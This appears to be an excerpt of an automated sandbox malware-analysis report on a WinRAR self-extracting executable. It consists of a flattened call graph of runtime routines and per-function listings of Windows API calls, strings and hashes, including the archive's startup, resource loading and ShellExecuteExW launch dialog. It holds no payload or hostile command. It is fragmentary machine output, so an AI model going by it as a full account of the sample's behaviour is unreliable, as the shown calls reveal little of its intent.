GetFileAttributesW 23798->23799 23799->23796 23801 c6a250 GetFileAttributesW 23800->23801 23801->23795 23801->23796 23803 c6bb10 _wcslen 23802->23803 23804 c6bbb8 GetCurrentDirectoryW 23803->23804 23805 c6bb39 _wcslen 23803->23805 23804->23805 23805->23798 23807 c88e44 23806->23807 23811 c88e14 _unexpected 23806->23811 23816 c891a8 20 API calls __dosmaperr 23807->23816 23809 c88e2f RtlAllocateHeap 23810 c88e42 23809->23810 23809->23811 23810->23782 23811->23807 23811->23809 23815 c87a5e 7 API calls 2 library calls 23811->23815 23813->23782 23814->23777 23815->23811 23816->23810 23821 c88268 23832 c8bb30 23821->23832 23827 c88dcc _free 20 API calls 23828 c882ba 23827->23828 23829 c88290 23830 c88dcc _free 20 API calls 23829->23830 23831 c88285 23830->23831 23831->23827 23833 c8bb39 23832->23833 23834 c8827a 23832->23834 23849 c8ba27 23833->23849 23836 c8bf30 GetEnvironmentStringsW 23834->23836 23837 c8bf9a 23836->23837 23838 c8bf47 23836->23838 23839 c8827f 23837->23839 23840 c8bfa3 FreeEnvironmentStringsW 23837->23840 23841 c8bf4d WideCharToMultiByte 23838->23841 23839->23831 23848 c882c0 26 API calls 4 library calls 23839->23848 23840->23839 23841->23837 23842 c8bf69 23841->23842 23843 c88e06 __vswprintf_c_l 21 API calls 23842->23843 23844 c8bf6f 23843->23844 23845 c8bf8c 23844->23845 23846 c8bf76 WideCharToMultiByte 23844->23846 23847 c88dcc _free 20 API calls 23845->23847 23846->23845 23847->23837 23848->23829 23850 c897e5 _unexpected 38 API calls 23849->23850 23851 c8ba34 23850->23851 23869 c8bb4e 23851->23869 23853 c8ba3c 23878 c8b7bb 23853->23878 23856 c8ba53 23856->23834 23857 c88e06 __vswprintf_c_l 21 API calls 23858 c8ba64 23857->23858 23859 c8ba96 23858->23859 23885 c8bbf0 23858->23885 23861 c88dcc _free 20 API calls 23859->23861 23861->23856 23863 c8ba91 23895 c891a8 20 API calls __dosmaperr 23863->23895 23865 c8bada 23865->23859 23896 c8b691 26 API calls 23865->23896 23866 c8baae 23866->23865 23867 c88dcc _free 20 API calls 23866->23867 23867->23865 23870 c8bb5a __FrameHandler3::FrameUnwindToState 23869->23870 23871 c897e5 _unexpected 38 API calls 23870->23871 23876 c8bb64 23871->23876 23873 c8bbe8 _abort 23873->23853 23876->23873 23877 c88dcc _free 20 API calls 23876->23877 23897 c88d24 38 API calls _abort 23876->23897 23898 c8ac31 EnterCriticalSection 23876->23898 23899 c8bbdf LeaveCriticalSection _abort 23876->23899 23877->23876 23879 c84636 __cftof 38 API calls 23878->23879 23880 c8b7cd 23879->23880 23881 c8b7dc GetOEMCP 23880->23881 23882 c8b7ee 23880->23882 23884 c8b805 23881->23884 23883 c8b7f3 GetACP 23882->23883 23882->23884 23883->23884 23884->23856 23884->23857 23886 c8b7bb 40 API calls 23885->23886 23887 c8bc0f 23886->23887 23890 c8bc60 IsValidCodePage 23887->23890 23892 c8bc16 23887->23892 23894 c8bc85 _abort 23887->23894 23888 c7fbbc _ValidateLocalCookies 5 API calls 23889 c8ba89 23888->23889 23889->23863 23889->23866 23891 c8bc72 GetCPInfo 23890->23891 23890->23892 23891->23892 23891->23894 23892->23888 23900 c8b893 GetCPInfo 23894->23900 23895->23859 23896->23859 23898->23876 23899->23876 23901 c8b977 23900->23901 23903 c8b8cd 23900->23903 23905 c7fbbc _ValidateLocalCookies 5 API calls 23901->23905 23910 c8c988 23903->23910 23907 c8ba23 23905->23907 23907->23892 23909 c8ab78 __vswprintf_c_l 43 API calls 23909->23901 23911 c84636 __cftof 38 API calls 23910->23911 23912 c8c9a8 MultiByteToWideChar 23911->23912 23914 c8c9e6 23912->23914 23922 c8ca7e 23912->23922 23915 c8ca07 _abort __vsnwprintf_l 23914->23915 23919 c88e06 __vswprintf_c_l 21 API calls 23914->23919 23918 c8ca78 23915->23918 23921 c8ca4c MultiByteToWideChar 23915->23921 23916 c7fbbc _ValidateLocalCookies 5 API calls 23917 c8b92e 23916->23917 23924 c8ab78 23917->23924 23929 c8abc3 20 API calls _free 23918->23929 23919->23915 23921->23918 23923 c8ca68 GetStringTypeW 23921->23923 23922->23916 23923->23918 23925 c84636 __cftof 38 API calls 23924->23925 23926 c8ab8b 23925->23926 23930 c8a95b 23926->23930 23929->23922 23931 c8a976 __vswprintf_c_l 23930->23931 23932 c8a99c MultiByteToWideChar 23931->23932 23933 c8ab50 23932->23933 23934 c8a9c6 23932->23934 23935 c7fbbc _ValidateLocalCookies 5 API calls 23933->23935 23937 c88e06 __vswprintf_c_l 21 API calls 23934->23937 23941 c8a9e7 __vsnwprintf_l 23934->23941 23936 c8ab63 23935->23936 23936->23909 23937->23941 23938 c8aa9c 23966 c8abc3 20 API calls _free 23938->23966 23939 c8aa30 MultiByteToWideChar 23939->23938 23940 c8aa49 23939->23940 23957 c8af6c 23940->23957 23941->23938 23941->23939 23945 c8aaab 23947 c88e06 __vswprintf_c_l 21 API calls 23945->23947 23950 c8aacc __vsnwprintf_l 23945->23950 23946 c8aa73 23946->23938 23948 c8af6c __vswprintf_c_l 11 API calls 23946->23948 23947->23950 23948->23938 23949 c8ab41 23965 c8abc3 20 API calls _free 23949->23965 23950->23949 23951 c8af6c __vswprintf_c_l 11 API calls 23950->23951 23953 c8ab20 23951->23953 23953->23949 23954 c8ab2f WideCharToMultiByte 23953->23954 23954->23949 23955 c8ab6f 23954->23955 23967 c8abc3 20 API calls _free 23955->23967 23968 c8ac98 23957->23968 23961 c8afdc LCMapStringW 23962 c8af9c 23961->23962 23963 c7fbbc _ValidateLocalCookies 5 API calls 23962->23963 23964 c8aa60 23963->23964 23964->23938 23964->23945 23964->23946 23965->23938 23966->23933 23967->23938 23969 c8acc8 23968->23969 23972 c8acc4 23968->23972 23969->23962 23975 c8aff4 10 API calls 3 library calls 23969->23975 23970 c8ace8 23970->23969 23973 c8acf4 GetProcAddress 23970->23973 23972->23969 23972->23970 23976 c8ad34 23972->23976 23974 c8ad04 _unexpected 23973->23974 23974->23969 23975->23961 23977 c8ad55 LoadLibraryExW 23976->23977 23981 c8ad4a 23976->23981 23978 c8ad8a 23977->23978 23979 c8ad72 GetLastError 23977->23979 23978->23981 23982 c8ada1 FreeLibrary 23978->23982 23979->23978 23980 c8ad7d LoadLibraryExW 23979->23980 23980->23978 23981->23972 23982->23981 25485 c87f6e 52 API calls 2 library calls 25435 c7c793 107 API calls 4 library calls 24874 c69a74 24878 c69a7e 24874->24878 24875 c69ab1 24876 c69b9d SetFilePointer 24876->24875 24877 c69bb6 GetLastError 24876->24877 24877->24875 24878->24875 24878->24876 24879 c6981a 79 API calls 24878->24879 24880 c69b79 24878->24880 24879->24880 24880->24876 25436 c61075 84 API calls 25486 c61f72 128 API calls __EH_prolog 25437 c7a070 10 API calls 25439 c7b270 99 API calls 24914 c69f7a 24915 c69f8f 24914->24915 24916 c69f88 24914->24916 24917 c69f9c GetStdHandle 24915->24917 24921 c69fab 24915->24921 24917->24921 24918 c6a003 WriteFile 24918->24921 24919 c69fd4 WriteFile 24920 c69fcf 24919->24920 24919->24921 24920->24919 24920->24921 24921->24916 24921->24918 24921->24919 24921->24920 24923 c6a095 24921->24923 24925 c66baa 78 API calls 24921->24925 24926 c66e98 77 API calls 24923->24926 24925->24921 24926->24916 25441 c7a400 GdipDisposeImage GdipFree 25442 c7d600 70 API calls 25443 c86000 QueryPerformanceFrequency QueryPerformanceCounter 25445 c8f200 51 API calls 25490 c82900 6 API calls 4 library calls 25492 c8a700 21 API calls 25494 c61710 86 API calls 25495 c7ad10 73 API calls 25448 c61025 29 API calls 25449 c7c220 93 API calls _swprintf 25451 c8f421 21 API calls __vswprintf_c_l 25498 c7f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25499 c7ff30 LocalFree 25453 c8c030 GetProcessHeap

                                                                                              Executed Functions

                                                                                              Function 00C7DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00C70863: GetModuleHandleW.KERNEL32(kernel32), ref: 00C7087C
                                                                                                • Part of subcall function 00C70863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00C7088E
                                                                                                • Part of subcall function 00C70863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C708BF
                                                                                                • Part of subcall function 00C7A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00C7A655
                                                                                                • Part of subcall function 00C7AC16: OleInitialize.OLE32(00000000), ref: 00C7AC2F
                                                                                                • Part of subcall function 00C7AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00C7AC66
                                                                                                • Part of subcall function 00C7AC16: SHGetMalloc.SHELL32(00CA8438), ref: 00C7AC70
                                                                                              • GetCommandLineW.KERNEL32 ref: 00C7DF5C
                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00C7DF83
                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00C7DF94
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00C7DFCE
                                                                                                • Part of subcall function 00C7DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00C7DBF4
                                                                                                • Part of subcall function 00C7DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00C7DC30
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C7DFD7
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00CBEC90,00000800), ref: 00C7DFF2
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00CBEC90), ref: 00C7DFFE
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00C7E009
                                                                                              • _swprintf.LIBCMT ref: 00C7E048
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00C7E05A
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00C7E061
                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 00C7E078
                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00C7E0C9
                                                                                              • Sleep.KERNEL32(?), ref: 00C7E0F7
                                                                                              • DeleteObject.GDI32 ref: 00C7E130
                                                                                              • DeleteObject.GDI32(?), ref: 00C7E140
                                                                                              • CloseHandle.KERNEL32 ref: 00C7E183
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3049964643-433059772
                                                                                              • Opcode ID: aa1ceda1c0af4fe87ce6369f37e48b8d035336b735952fd092dddeca9e6f898e
                                                                                              • Instruction ID: 0012b75273cf2d8300130dc8b2e8d2c05701a177c899774862f619a227f1bb82
                                                                                              • Opcode Fuzzy Hash: aa1ceda1c0af4fe87ce6369f37e48b8d035336b735952fd092dddeca9e6f898e
                                                                                              • Instruction Fuzzy Hash: 08610971904345AFD720ABB4EC4EF6F3BACEB49744F04442AF90A922A2DB749E44D761
                                                                                              Function 00C7A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 812 c7a6c2-c7a6df FindResourceW 813 c7a6e5-c7a6f6 SizeofResource 812->813 814 c7a7db 812->814 813->814 816 c7a6fc-c7a70b LoadResource 813->816 815 c7a7dd-c7a7e1 814->815 816->814 817 c7a711-c7a71c LockResource 816->817 817->814 818 c7a722-c7a737 GlobalAlloc 817->818 819 c7a7d3-c7a7d9 818->819 820 c7a73d-c7a746 GlobalLock 818->820 819->815 821 c7a7cc-c7a7cd GlobalFree 820->821 822 c7a74c-c7a76a call c80320 CreateStreamOnHGlobal 820->822 821->819 825 c7a7c5-c7a7c6 GlobalUnlock 822->825 826 c7a76c-c7a78e call c7a626 822->826 825->821 826->825 831 c7a790-c7a798 826->831 832 c7a7b3-c7a7c1 831->832 833 c7a79a-c7a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 c7a7b0 833->834 834->832
                                                                                              APIs
                                                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00C7B73D,00000066), ref: 00C7A6D5
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A6EC
                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A703
                                                                                              • LockResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A712
                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00C7B73D,00000066), ref: 00C7A72D
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00C7A73E
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00C7A762
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00C7A7C6
                                                                                                • Part of subcall function 00C7A626: GdipAlloc.GDIPLUS(00000010), ref: 00C7A62C
                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00C7A7A7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00C7A7CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                              • String ID: PNG
                                                                                              • API String ID: 211097158-364855578
                                                                                              • Opcode ID: 4c480b63c3fbc013e44cd455193efe4932a27d2e214e13b846bbee76eaf6a5fa
                                                                                              • Instruction ID: de377fa7529e38a5a7d18413790a3c35afe18b5b20bd184b6998947ec92ce97b
                                                                                              • Opcode Fuzzy Hash: 4c480b63c3fbc013e44cd455193efe4932a27d2e214e13b846bbee76eaf6a5fa
                                                                                              • Instruction Fuzzy Hash: A2319E75600342BFC7149F21EC8DF2F7BB8EF84750B04851AF91982620EB31DD449AA2
                                                                                              Function 00C6A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1025 c6a69b-c6a6bf call c7ec50 1028 c6a727-c6a730 FindNextFileW 1025->1028 1029 c6a6c1-c6a6ce FindFirstFileW 1025->1029 1030 c6a742-c6a7ff call c70602 call c6c310 call c715da * 3 1028->1030 1031 c6a732-c6a740 GetLastError 1028->1031 1029->1030 1032 c6a6d0-c6a6e2 call c6bb03 1029->1032 1036 c6a804-c6a811 1030->1036 1033 c6a719-c6a722 1031->1033 1040 c6a6e4-c6a6fc FindFirstFileW 1032->1040 1041 c6a6fe-c6a707 GetLastError 1032->1041 1033->1036 1040->1030 1040->1041 1043 c6a717 1041->1043 1044 c6a709-c6a70c 1041->1044 1043->1033 1044->1043 1046 c6a70e-c6a711 1044->1046 1046->1043 1047 c6a713-c6a715 1046->1047 1047->1033
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6C4
                                                                                                • Part of subcall function 00C6BB03: _wcslen.LIBCMT ref: 00C6BB27
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6F2
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6FE
                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A728
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A734
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 42610566-0
                                                                                              • Opcode ID: d11b3b73514be654e6c45e8acb80266631693e5837e3e36045cc788253fff3a2
                                                                                              • Instruction ID: 8dc71403fbfe9721b366b309b80ccbb0a9c9e536af3ba3b6b109c9c5bd9007b0
                                                                                              • Opcode Fuzzy Hash: d11b3b73514be654e6c45e8acb80266631693e5837e3e36045cc788253fff3a2
                                                                                              • Instruction Fuzzy Hash: E4415B72900555ABCB25DF68CCC8BEAB7B8FB48350F144296E96DE3240D734AE94DF90
                                                                                              Function 00C87DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00C87DC4,00000000,00C9C300,0000000C,00C87F1B,00000000,00000002,00000000), ref: 00C87E0F
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00C87DC4,00000000,00C9C300,0000000C,00C87F1B,00000000,00000002,00000000), ref: 00C87E16
                                                                                              • ExitProcess.KERNEL32 ref: 00C87E28
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: e0ec2470514da5bc901d64663d3243f7ac90f84eec74d81c17b9939ebe49a333
                                                                                              • Instruction ID: 54d7062191c5b88ce0d9234d79ac783ae75b93b2f4709b713d3771ae9e5c736e
                                                                                              • Opcode Fuzzy Hash: e0ec2470514da5bc901d64663d3243f7ac90f84eec74d81c17b9939ebe49a333
                                                                                              • Instruction Fuzzy Hash: 84E0B631004188EFCF117F64DD0EB4E7F6AEB51386B104555F8198A132DB3ADE52DB98
                                                                                              Function 00C6848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 61a67050fb97fc868a2981603a1dfe4ca2d07b28268b8d09cf22ef0c13f2483e
                                                                                              • Instruction ID: 0ac7d98797c82b4c4db88908d3eb1681dd5ecf6a347ad7e4286cc616fe907aac
                                                                                              • Opcode Fuzzy Hash: 61a67050fb97fc868a2981603a1dfe4ca2d07b28268b8d09cf22ef0c13f2483e
                                                                                              • Instruction Fuzzy Hash: 6A821A70904245AEDF35DF64C8D5BFABBB9AF05300F0842B9E9599B182CB315B8CDB61
                                                                                              Function 00C7B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C7B7E5
                                                                                                • Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
                                                                                                • Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7B8D1
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B8EF
                                                                                              • IsDialogMessageW.USER32(?,?), ref: 00C7B902
                                                                                              • TranslateMessage.USER32(?), ref: 00C7B910
                                                                                              • DispatchMessageW.USER32(?), ref: 00C7B91A
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00C7B93D
                                                                                              • EndDialog.USER32(?,00000001), ref: 00C7B960
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00C7B983
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00C7B99E
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00C935F4), ref: 00C7B9B1
                                                                                                • Part of subcall function 00C7D453: _wcslen.LIBCMT ref: 00C7D47D
                                                                                              • SetFocus.USER32(00000000), ref: 00C7B9B8
                                                                                              • _swprintf.LIBCMT ref: 00C7BA24
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                                • Part of subcall function 00C7D4D4: GetDlgItem.USER32(00000068,00CBFCB8), ref: 00C7D4E8
                                                                                                • Part of subcall function 00C7D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00C7AF07,00000001,?,?,00C7B7B9,00C9506C,00CBFCB8,00CBFCB8,00001000,00000000,00000000), ref: 00C7D510
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00C7D51B
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00C935F4), ref: 00C7D529
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C7D53F
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00C7D559
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C7D59D
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00C7D5AB
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C7D5BA
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C7D5E1
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00C943F4), ref: 00C7D5F0
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00C7BA68
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00C7BA90
                                                                                              • GetTickCount.KERNEL32 ref: 00C7BAAE
                                                                                              • _swprintf.LIBCMT ref: 00C7BAC2
                                                                                              • GetLastError.KERNEL32(?,00000011), ref: 00C7BAF4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00C7BB43
                                                                                              • _swprintf.LIBCMT ref: 00C7BB7C
                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00C7BBD0
                                                                                              • GetCommandLineW.KERNEL32 ref: 00C7BBEA
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00C7BC47
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00C7BC6F
                                                                                              • Sleep.KERNEL32(00000064), ref: 00C7BCB9
                                                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00C7BCE2
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C7BCEB
                                                                                              • _swprintf.LIBCMT ref: 00C7BD1E
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7BD7D
                                                                                              • SetDlgItemTextW.USER32(?,00000065,00C935F4), ref: 00C7BD94
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00C7BD9D
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00C7BDAC
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C7BDBB
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7BE68
                                                                                              • _wcslen.LIBCMT ref: 00C7BEBE
                                                                                              • _swprintf.LIBCMT ref: 00C7BEE8
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00C7BF32
                                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00C7BF4C
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00C7BF55
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00C7BF6B
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00C7BF85
                                                                                              • SetWindowTextW.USER32(00000000,00CAA472), ref: 00C7BFA7
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00C7C007
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7C01A
                                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00C7C0BD
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00C7C197
                                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00C7C1D9
